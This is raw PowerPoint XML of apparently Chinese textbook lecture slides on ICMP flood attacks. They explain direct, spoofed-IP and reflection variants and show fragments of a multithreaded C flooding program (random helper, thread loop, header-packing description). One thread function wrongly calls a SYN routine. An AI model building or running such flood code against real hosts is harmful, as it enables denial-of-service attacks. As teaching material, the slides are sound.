            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.8.1  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>13.8.2  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>洪水攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="602517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13.8.1  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击的原理</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ICMP Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一种在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>基础上形成的，但是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>程序很少能造成目标机宕机的问题。这里边最大的问题是提高处理的速度。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>洪水攻击主要有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>种方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>直接洪水攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>伪装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>反射攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="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3140968"/>
            <a:ext cx="4812794"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descr="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9653" y="4509120"/>
            <a:ext cx="4706803"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0871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777" y="1849908"/>
            <a:ext cx="5119687" cy="424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13.8.2  ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>洪水攻击的例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随机函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>myrandom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>．多线程函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS_fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部打包函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS_icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>．线程函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS_fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>．主函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3754782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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>．随机函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>myrandom</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rPr>
              <a:t>随机函数主要为了生成一个不重复的并位于一定数值空间的值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>static inline long myrandom (int begin, int end)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gap = end - begin +1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ret = 0;</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用系统时间初始化</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srand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>((unsigned)time(0));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>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产生一个介于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>之间的值</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     ret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>= random()%gap + begin;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ret;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39453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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>．多线程函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>DoS_fun()</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本程序也是使用多线程进行协同工作，线程函数为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DoS_fun()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，一直进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的连接。</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static void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DoS_fun (unsigned long ip)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>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     while(alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>    {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>         DoS_syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRP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496967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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>头部打包函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>DoS_icmp()</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DoS_icmp()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>函数打包并填充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>头部发送数据报文。由于打包函数是本程序中最经常使用的，容易造成计算上的瓶颈，所以对其进行了优化，校验和并没有完全计算，而仅仅计算了两次数据变化造成的校验和差值。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389880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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>．线程函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>DoS_fun()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="黑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当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，一直执行函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>icmp()</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static void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DoS_fun (unsigned long ip)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     while(alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>           icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRP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295057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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" kern="1800" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="黑体"/>
              </a:rPr>
              <a:t>．主函数</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函数的头文件和重要的变量代码如下：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#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#include &lt;stdlib.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#include &lt;time.h&gt; </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#define MAXCHILD 128</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最多线程数</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static unsigned long dest = 0;</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目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址</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static int PROTO_ICMP = -1;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en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>协议的值</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static alive = -1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="-25000" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
